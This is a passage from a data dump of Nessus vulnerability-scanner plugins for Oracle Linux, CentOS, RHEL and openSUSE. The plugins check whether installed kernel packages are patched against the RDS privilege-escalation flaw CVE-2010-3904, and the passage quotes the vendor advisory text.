value:\"p-cpe:/a:oracle:linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n cve_list = make_list(\"CVE-2010-3904\"); \n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for ELSA-2010-0792\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nkernel_major_minor = get_kb_item(\"Host/uname/major_minor\");\nif (empty_or_null(kernel_major_minor)) exit(1, \"Unable to determine kernel major-minor level.\");\nexpected_kernel_major_minor = \"2.6\";\nif (kernel_major_minor != expected_kernel_major_minor)\n audit(AUDIT_OS_NOT, \"running kernel level \" + expected_kernel_major_minor + \", it is running kernel level \" + kernel_major_minor);\n\nflag = 0;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-2.6.18-194.17.4.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-194.17.4.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-PAE-devel-2.6.18\") && rpm_check(release:\"EL5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-194.17.4.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-2.6.18-194.17.4.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-debug-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-debug-devel-2.6.18-194.17.4.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-devel-2.6.18-194.17.4.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-doc-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-doc-2.6.18-194.17.4.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-headers-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-headers-2.6.18-194.17.4.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-2.6.18-194.17.4.0.1.el5\")) flag++;\nif (rpm_exists(release:\"EL5\", rpm:\"kernel-xen-devel-2.6.18\") && rpm_check(release:\"EL5\", reference:\"kernel-xen-devel-2.6.18-194.17.4.0.1.el5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"affected kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:54:16", "description": "Updated kernel packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThis update fixes the following security issue :\n\n* The rds_page_copy_user() function in the Linux kernel Reliable Datagram Sockets (RDS) protocol implementation was missing sanity checks. A local, unprivileged user could use this flaw to escalate their privileges. (CVE-2010-3904, Important)\n\nRed Hat would like to thank Dan Rosenberg of Virtual Security Research for reporting this issue.\n\nUsers should upgrade to these updated packages, which contain a backported patch to correct this issue. The system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2010-11-24T00:00:00", "type": "nessus", "title": "CentOS 5 : kernel (CESA-2010:0792)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:centos:centos:kernel", "p-cpe:/a:centos:centos:kernel-pae", "p-cpe:/a:centos:centos:kernel-pae-devel", "p-cpe:/a:centos:centos:kernel-debug", "p-cpe:/a:centos:centos:kernel-debug-devel", "p-cpe:/a:centos:centos:kernel-devel", "p-cpe:/a:centos:centos:kernel-doc", "p-cpe:/a:centos:centos:kernel-headers", "p-cpe:/a:centos:centos:kernel-xen", "p-cpe:/a:centos:centos:kernel-xen-devel", "cpe:/o:centos:centos:5"], "id": "CENTOS_RHSA-2010-0792.NASL", "href": "https://www.tenable.com/plugins/nessus/50797", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0792 and \n# CentOS Errata and Security Advisory 2010:0792 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50797);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2010-3904\");\n script_bugtraq_id(44219);\n script_xref(name:\"RHSA\", value:\"2010:0792\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"CentOS 5 : kernel (CESA-2010:0792)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote CentOS host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* The rds_page_copy_user() function in the Linux kernel Reliable\nDatagram Sockets (RDS) protocol implementation was missing sanity\nchecks. A local, unprivileged user could use this flaw to escalate\ntheir privileges. (CVE-2010-3904, Important)\n\nRed Hat would like to thank Dan Rosenberg of Virtual Security Research\nfor reporting this issue.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.\");\n # https://lists.centos.org/pipermail/centos-announce/2010-October/017121.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?35d45651\");\n # https://lists.centos.org/pipermail/centos-announce/2010-October/017122.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2062c3a4\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected kernel packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/11/24\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:5\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CentOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 5.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", cpu:\"i386\", reference:\"kernel-PAE-devel-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-debug-devel-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-devel-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-doc-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-headers-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-2.6.18-194.17.4.el5\")) flag++;\nif (rpm_check(release:\"CentOS-5\", reference:\"kernel-xen-devel-2.6.18-194.17.4.el5\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-debug / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:52:31", "description": "Updated kernel packages that fix one security issue are now available for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nThis update fixes the following security issue :\n\n* The rds_page_copy_user() function in the Linux kernel Reliable Datagram Sockets (RDS) protocol implementation was missing sanity checks. A local, unprivileged user could use this flaw to escalate their privileges. (CVE-2010-3904, Important)\n\nRed Hat would like to thank Dan Rosenberg of Virtual Security Research for reporting this issue.\n\nUsers should upgrade to these updated packages, which contain a backported patch to correct this issue. The system must be rebooted for this update to take effect.", "cvss3": {}, "published": "2010-10-26T00:00:00", "type": "nessus", "title": "RHEL 5 : kernel (RHSA-2010:0792)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-3904"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:kernel", "p-cpe:/a:redhat:enterprise_linux:kernel-pae", "p-cpe:/a:redhat:enterprise_linux:kernel-pae-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-doc", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-xen", "p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel", "cpe:/o:redhat:enterprise_linux:5"], "id": "REDHAT-RHSA-2010-0792.NASL", "href": "https://www.tenable.com/plugins/nessus/50340", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2010:0792. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50340);\n script_version(\"1.28\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2010-3904\");\n script_bugtraq_id(44219);\n script_xref(name:\"RHSA\", value:\"2010:0792\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/06/02\");\n\n script_name(english:\"RHEL 5 : kernel (RHSA-2010:0792)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Red Hat host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nimportant security impact. A Common Vulnerability Scoring System\n(CVSS) base score, which gives a detailed severity rating, is\navailable from the CVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issue :\n\n* The rds_page_copy_user() function in the Linux kernel Reliable\nDatagram Sockets (RDS) protocol implementation was missing sanity\nchecks. A local, unprivileged user could use this flaw to escalate\ntheir privileges. (CVE-2010-3904, Important)\n\nRed Hat would like to thank Dan Rosenberg of Virtual Security Research\nfor reporting this issue.\n\nUsers should upgrade to these updated packages, which contain a\nbackported patch to correct this issue. The system must be rebooted\nfor this update to take effect.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/cve-2010-3904\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2010:0792\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Reliable Datagram Sockets (RDS) rds_page_copy_user Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/12/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/10/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/10/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-PAE-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2010-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2010-3904\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2010:0792\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2010:0792\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-PAE-devel-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-debug-devel-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-debug-devel-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-debug-devel-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-devel-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-devel-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-devel-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", reference:\"kernel-doc-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i386\", reference:\"kernel-headers-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-headers-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-headers-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"s390x\", reference:\"kernel-kdump-devel-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"i686\", reference:\"kernel-xen-devel-2.6.18-194.17.4.el5\")) flag++;\n if (rpm_check(release:\"RHEL5\", cpu:\"x86_64\", reference:\"kernel-xen-devel-2.6.18-194.17.4.el5\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-PAE / kernel-PAE-devel / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-17T15:53:34", "description": "This update of the openSUSE 11.2 Linux kernel fixes two critical security issues and some bugs.\n\nFollowing security issues were fixed: CVE-2010-3904: A local privilege escalation in RDS sockets allowed local attackers to gain root privileges.\n\nCVE-2010-2963: A problem in the compat ioctl handling in video4linux allowed local attackers with a video device plugged in to gain root privileges on x86_64 systems.", "cvss3": {}, "published": "2010-10-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : kernel (openSUSE-SU-2010:0919-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2010-2963", "CVE-2010-3904"], "modified": "2023-05-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:kernel-debug", "p-cpe:/a:novell:opensuse:kernel-debug-base", "p-cpe:/a:novell:opensuse:kernel-debug-devel", "p-cpe:/a:novell:opensuse:kernel-default", "p-cpe:/a:novell:opensuse:kernel-default-base", "p-cpe:/a:novell:opensuse:kernel-default-devel", "p-cpe:/a:novell:opensuse:kernel-desktop", "p-cpe:/a:novell:opensuse:kernel-desktop-base", "p-cpe:/a:novell:opensuse:kernel-desktop-devel", "p-cpe:/a:novell:opensuse:kernel-pae", "p-cpe:/a:novell:opensuse:kernel-pae-base", "p-cpe:/a:novell:opensuse:kernel-pae-devel", "p-cpe:/a:novell:opensuse:kernel-source", "p-cpe:/a:novell:opensuse:kernel-source-vanilla", "p-cpe:/a:novell:opensuse:kernel-syms", "p-cpe:/a:novell:opensuse:kernel-trace", "p-cpe:/a:novell:opensuse:kernel-trace-base", "p-cpe:/a:novell:opensuse:kernel-trace-devel", "p-cpe:/a:novell:opensuse:kernel-vanilla", "p-cpe:/a:novell:opensuse:kernel-vanilla-base", "p-cpe:/a:novell:opensuse:kernel-vanilla-devel", "p-cpe:/a:novell:opensuse:kernel-xen", "p-cpe:/a:novell:opensuse:kernel-xen-base", "p-cpe:/a:novell:opensuse:kernel-xen-devel", "p-cpe:/a:novell:opensuse:preload-kmp-default", "p-cpe:/a:novell:opensuse:preload-kmp-desktop", "cpe:/o:novell:opensuse:11.2"], "id": "SUSE_11_2_KERNEL-101026.NASL", "href": "https://www.tenable.com/plugins/nessus/50409", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update kernel-3398.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(50409);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/14\");\n\n script_cve_id(\"CVE-2010-2963\", \"CVE-2010-3904\");\n 